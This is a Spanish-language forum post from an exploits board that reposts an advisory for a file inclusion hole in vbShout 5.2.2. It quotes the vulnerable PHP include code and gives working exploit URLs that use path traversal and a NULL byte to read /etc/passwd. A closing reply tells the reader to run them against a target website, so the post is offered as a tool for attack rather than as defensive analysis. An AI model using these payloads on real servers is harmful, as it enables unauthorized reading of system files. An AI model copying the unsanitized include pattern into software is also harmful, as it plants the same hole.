Para vbShout, si no entienden algo como siempre avisen, hermanos.

Código: Seleccionar todo

#################################################
+
+  Title:       vbShout 5.2.2 Remote/Local File Inlcusion (Mod/Admin)
+  Author:      fred777 - [fred777.5x.to]
+  Link:        http://www.dragonbyte-tech.com/vbecommerce.php?do=purchase&act=product&id=2
+  Vuln:        vbshout.php?do=[path/file][NULL-Byte]
+  Greetzz to:  SceneCoderz
+  Contact:     [email protected]
+
#################################################
  
--[ Vuln Code ] --
  
modcp/vbshout.php:
admincp/vbshout.php:
 
 
else if (!empty($_GET['do']))
{
    // We had a GET request instead
 
$action = $_GET['do'];
 
if (!empty($_POST['do']))
{
    // $_POST requests take priority
     
$action = $_POST['do'];
}
 
 
if (!file_exists(DIR . '/dbtech/vbshout/includes/actions/admin/' . $action . '.php'))
{
    if (!file_exists(DIR . '/dbtech/vbshout_pro/includes/actions/admin/' . $action . '.php'))
    {
        // Throw error from invalid action
        print_cp_message($vbphrase['dbtech_vbshout_invalid_action']);
    }
    else
    {
        // Include the selected file
        include_once(DIR . '/dbtech/vbshout_pro/includes/actions/admin/' . $action . '.php');  
    }
}
else
{
    // Include the selected file
    include_once(DIR . '/dbtech/vbshout/includes/actions/admin/' . $action . '.php');  
}
 
=>
 
../../../../../../etc/passwd%00
  
################################################
  
--[ Exploitable ]--
  
http://server/vbshout.php?do=[PATH/FILE][NULL-Byte]
  
http://server/vbshout.php?do=../../../../../../../../etc/passwd%00
  
You must be mod oder admin:
modcp/vbshout.php
admincp/vbshout.php
  
################################################

Es leer el codigo amigo, es facil, la primera parte te muestra el codigo vulnerable y después, pone exploitable, pues tienes que hacer lo que dice hay, pero intercambiando con la web.
Responder

Volver a “Exploits”